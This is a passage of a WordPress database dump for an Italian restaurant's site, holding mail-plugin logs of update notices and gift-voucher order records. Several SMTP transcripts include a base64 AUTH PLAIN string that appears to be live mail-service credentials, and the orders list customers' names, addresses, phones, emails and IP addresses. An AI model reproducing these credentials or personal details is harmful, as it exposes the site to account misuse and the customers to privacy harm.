Team'),(37806,3714,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37240,3672,'solution','All good, mail sent.'),(37241,3672,'success','1'),(37242,3672,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37243,3672,'to_header','webmaster@baldisserri.com'),(37244,3672,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37245,3672,'original_to','webmaster@baldisserri.com'),(37246,3672,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37247,3672,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Contact Form 7 (from version 5.3.1 to 5.3.2)\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (from version 3.1.0 to 3.1.1)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37248,3672,'original_headers',''),(37249,3672,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <2c4ba8b51bf480f34f9cc5b11fe27e73@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Thu, 17 Dec 2020 12:29:45 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Cont=\r\nact Form 7 (from version 5.3.1 to 5.3.2)=0A- Newsletter, SMTP, Email mar=\r\nketing and Subscribe forms by Sendinblue (from version 3.1.0 to 3.1.1)=\r\n=0A=0A=0AIf you experience any issues or need support, the volunteers in=\r\n the WordPress.org support forums may be able to help.=0Ahttps://wordpre=\r\nss.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK queued as c4ee1376-acf0-42b5-975d-a5d7e327fe28\r\n'),(37250,3673,'solution','All good, mail sent.'),(37251,3673,'success','1'),(37252,3673,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37253,3673,'to_header','webmaster@baldisserri.com'),(37254,3673,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37255,3673,'original_to','webmaster@baldisserri.com'),(37256,3673,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37257,3673,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Direct Checkout for WooCommerce (from version 2.4.2 to 2.4.3)\n- UpdraftPlus - Backup/Restore (from version 1.16.42 to 1.16.43)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37258,3673,'original_headers',''),(37259,3673,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <42d0c7eb57802d85ad640cf99c5c9fd6@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Fri, 18 Dec 2020 00:23:08 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Dire=\r\nct Checkout for WooCommerce (from version 2.4.2 to 2.4.3)=0A- UpdraftPlu=\r\ns - Backup/Restore (from version 1.16.42 to 1.16.43)=0A=0A=0AIf you expe=\r\nrience any issues or need support, the volunteers in the WordPress.org s=\r\nupport forums may be able to help.=0Ahttps://wordpress.org/support/forum=\r\ns/=0A=0AThe WordPress Team\r\n.\r\n250 OK queued as aa845cfa-9214-43b6-b33c-3c4a2d995220\r\n'),(37260,3674,'solution','All good, mail sent.'),(37261,3674,'success','1'),(37262,3674,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37263,3674,'to_header','webmaster@baldisserri.com'),(37264,3674,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37265,3674,'original_to','webmaster@baldisserri.com'),(37266,3674,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37267,3674,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (from version 2.3.14 to 2.3.15)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37268,3674,'original_headers',''),(37269,3674,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <bc0f70f039c13e2b92c3dd6fef312dbc@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Fri, 18 Dec 2020 12:26:51 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Cook=\r\nie and Consent Solution for the GDPR &amp; ePrivacy (from version 2.3.14=\r\n to 2.3.15)=0A=0A=0AIf you experience any issues or need support, the vo=\r\nlunteers in the WordPress.org support forums may be able to help.=0Ahttp=\r\ns://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK queued as 9862bab2-0ff4-41d0-bf66-6b0ba6495f4d\r\n'),(37270,3676,'_menu_item_type','post_type'),(37271,3676,'_menu_item_menu_item_parent','0'),(37272,3676,'_menu_item_object_id','476'),(37273,3676,'_menu_item_object','page'),(37274,3676,'_menu_item_target',''),(37275,3676,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37276,3676,'_menu_item_xfn',''),(37277,3676,'_menu_item_url',''),(37279,3677,'_order_key','wc_order_ytAfBeD8qnlB9'),(37280,3677,'_customer_user','0'),(37281,3677,'_payment_method','paypal'),(37282,3677,'_payment_method_title','PayPal'),(37283,3677,'_customer_ip_address','217.59.191.205'),(37284,3677,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(37285,3677,'_created_via','checkout'),(37286,3677,'_cart_hash','d7868f77dc1319f98d5cfa4201bebfc3'),(37287,3677,'_billing_first_name','Matteo'),(37288,3677,'_billing_last_name','Sandri'),(37289,3677,'_billing_address_1','Via Saragozza 157 Bologna'),(37290,3677,'_billing_city','Bologna'),(37291,3677,'_billing_state','BO'),(37292,3677,'_billing_postcode','40135'),(37293,3677,'_billing_country','IT'),(37294,3677,'_billing_email','matteo.sandri@bahlsen.it'),(37295,3677,'_billing_phone','3408565027'),(37296,3677,'_order_currency','EUR'),(37297,3677,'_cart_discount','0'),(37298,3677,'_cart_discount_tax','0'),(37299,3677,'_order_shipping','0.00'),(37300,3677,'_order_shipping_tax','0'),(37301,3677,'_order_tax','0'),(37302,3677,'_order_total','100.00'),(37303,3677,'_order_version','4.8.0'),(37304,3677,'_prices_include_tax','no'),(37305,3677,'_billing_address_index','Matteo Sandri  Via Saragozza 157 Bologna  Bologna BO 40135 IT matteo.sandri@bahlsen.it 3408565027'),(37306,3677,'_shipping_address_index','        '),(37307,3677,'is_vat_exempt','no'),(37308,3678,'_order_key','wc_order_6nDcnrxfr7tEJ'),(37309,3678,'_customer_user','0'),(37310,3678,'_payment_method','paypal'),(37311,3678,'_payment_method_title','PayPal'),(37312,3678,'_customer_ip_address','87.11.242.157'),(37313,3678,'_customer_user_agent','Mozilla/5.0 (Linux; Android 10; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36'),(37314,3678,'_created_via','checkout'),(37315,3678,'_cart_hash','28be753a63bc9f0f2f1cbda7d75f265f'),(37316,3678,'_billing_first_name','Elena'),(37317,3678,'_billing_last_name','Valentini'),(37318,3678,'_billing_address_1','Via Napoli 19'),(37319,3678,'_billing_city','Riccione'),(37320,3678,'_billing_state','RN'),(37321,3678,'_billing_postcode','47838'),(37322,3678,'_billing_country','IT'),(37323,3678,'_billing_email','c.lorenzetti@inwind.it'),(37324,3678,'_billing_phone','3382950071'),(37325,3678,'_order_currency','EUR'),(37326,3678,'_cart_discount','0'),(37327,3678,'_cart_discount_tax','0'),(37328,3678,'_order_shipping','0.00'),(37329,3678,'_order_shipping_tax','0'),(37330,3678,'_order_tax','0'),(37331,3678,'_order_total','100.00'),(37332,3678,'_order_version','4.8.0'),(37333,3678,'_prices_include_tax','no'),(37334,3678,'_billing_address_index','Elena Valentini  Via Napoli 19  Riccione RN 47838 IT c.lorenzetti@inwind.it 3382950071'),(37335,3678,'_shipping_address_index','        '),(37336,3678,'is_vat_exempt','no'),(37337,3679,'_order_key','wc_order_5fDQe2sHtFsh5'),(37338,3679,'_customer_user','0'),(37339,3679,'_payment_method','paypal'),(37340,3679,'_payment_method_title','PayPal'),(37341,3679,'_customer_ip_address','188.218.241.87'),(37342,3679,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(37343,3679,'_created_via','checkout'),(37344,3679,'_cart_hash','f7fcdd104143949f9b181ec866e698da'),(37345,3679,'_billing_first_name','Matteo'),(37346,3679,'_billing_last_name','Sandri'),(37347,3679,'_billing_address_1','Via Saragozza 157 Bologna'),(37348,3679,'_billing_city','Bologna'),(37349,3679,'_billing_state','BO'),(37350,3679,'_billing_postcode','40135'),(37351,3679,'_billing_country','IT'),(37352,3679,'_billing_email','matteo.sandri@bahlsen.it'),(37353,3679,'_billing_phone','3408565027'),(37354,3679,'_order_currency','EUR'),(37355,3679,'_cart_discount','0'),(37356,3679,'_cart_discount_tax','0'),(37357,3679,'_order_shipping','0.00'),(37358,3679,'_order_shipping_tax','0'),(37359,3679,'_order_tax','0'),(37360,3679,'_order_total','200.00'),(37361,3679,'_order_version','4.8.0'),(37362,3679,'_prices_include_tax','no'),(37363,3679,'_billing_address_index','Matteo Sandri  Via Saragozza 157 Bologna  Bologna BO 40135 IT matteo.sandri@bahlsen.it 3408565027'),(37364,3679,'_shipping_address_index','        '),(37365,3679,'is_vat_exempt','no'),(37366,3679,'Payment type','instant'),(37367,3679,'_transaction_id','13T57883SM8593009'),(37368,3679,'_paypal_status','completed'),(37369,3679,'PayPal Transaction Fee','7.15'),(37370,3679,'_date_paid','1608809217'),(37371,3679,'_paid_date','2020-12-24 12:26:57'),(37372,3679,'_download_permissions_granted','yes'),(37373,3679,'_recorded_sales','yes'),(37374,3679,'_recorded_coupon_usage_counts','yes'),(37375,3679,'_order_stock_reduced','yes'),(37376,3680,'solution','All good, mail sent.'),(37377,3680,'success','1'),(37378,3680,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37379,3680,'to_header','notifiche@ristorantesolymar.it'),(37380,3680,'reply_to_header','Matteo Sandri <matteo.sandri@bahlsen.it>'),(37381,3680,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37382,3680,'original_to','notifiche@ristorantesolymar.it'),(37383,3680,'original_subject','[Sol Y Mar] Prenotazione da nuovo cliente (3679) - 24 December 2020'),(37384,3680,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">You’ve received the following order from Matteo Sandri:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=3679&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Order #3679]</a> (24 December 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\">Laura Lucchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Tom e Edo</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Buon Natale 2020</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n	<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\">Laura e Matteo</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Tom e Edo</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Buon Natale parents!!!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">200,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">200,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Matteo Sandri<br>Via Saragozza 157 Bologna<br>40135<br>Bologna<br>BOLOGNA									<br><a href=\"tel:3408565027\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3408565027</a>													<br>matteo.sandri@bahlsen.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(37385,3680,'original_headers','Content-Type: text/html\r\nReply-to: Matteo Sandri <matteo.sandri@bahlsen.it>\r\n'),(37386,3680,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\nerif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0=\r\n 18px; text-align: left;\'>=0A=09<a class=3D\"link\" href=3D\"https://www.ri=\r\nstorantesolymar.it/wp-admin/post.php?post=3D3679&amp;action=3Dedit\" styl=\r\ne=3D\"font-weight: normal; text-decoration: underline; color: #557da1;\">[=\r\nOrder #3679]</a> (24 December 2020)</h2>=0A=0A<div style=3D\"margin-botto=\r\nm: 40px;\">=0A=09<table class=3D\"td\" cellspacing=3D\"0\" cellpadding=3D\"6\"=\r\n border=3D\"1\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertic=\r\nal-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica,=\r\n Roboto, Arial, sans-serif;\">=0A=09=09<thead>=0A=09=09=09<tr>=0A=09=09=\r\n=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1p=\r\nx solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left=\r\n;\">Product</th>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"co=\r\nlor: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding=\r\n: 12px; text-align: left;\">Quantity</th>=0A=09=09=09=09<th class=3D\"td\"=\r\n scope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e4e4; verti=\r\ncal-align: middle; padding: 12px; text-align: left;\">Price</th>=0A=09=09=\r\n=09</tr>=0A=09=09</thead>=0A=09=09<tbody>=0A=09=09=09=09<tr class=3D\"ord=\r\ner_item\">=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px=\r\n solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle;=\r\n font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; wo=\r\nrd-wrap: break-word;\">=0A=09=09Buono Regalo (valore a scelta) (#coupon)<=\r\nul class=3D\"wc-item-meta\" style=3D\"font-size: small; margin: 1em 0 0; pa=\r\ndding: 0; list-style: none;\">=0A<li style=3D\"margin: 0.5em 0 0; padding:=\r\n 0;\">=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; margi=\r\nn-right: .25em; clear: both;\">To:</strong> <p style=3D\"margin: 0;\">Laura=\r\n Lucchi</p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<s=\r\ntrong class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-right: .=\r\n25em; clear: both;\">From:</strong> <p style=3D\"margin: 0;\">Tom e 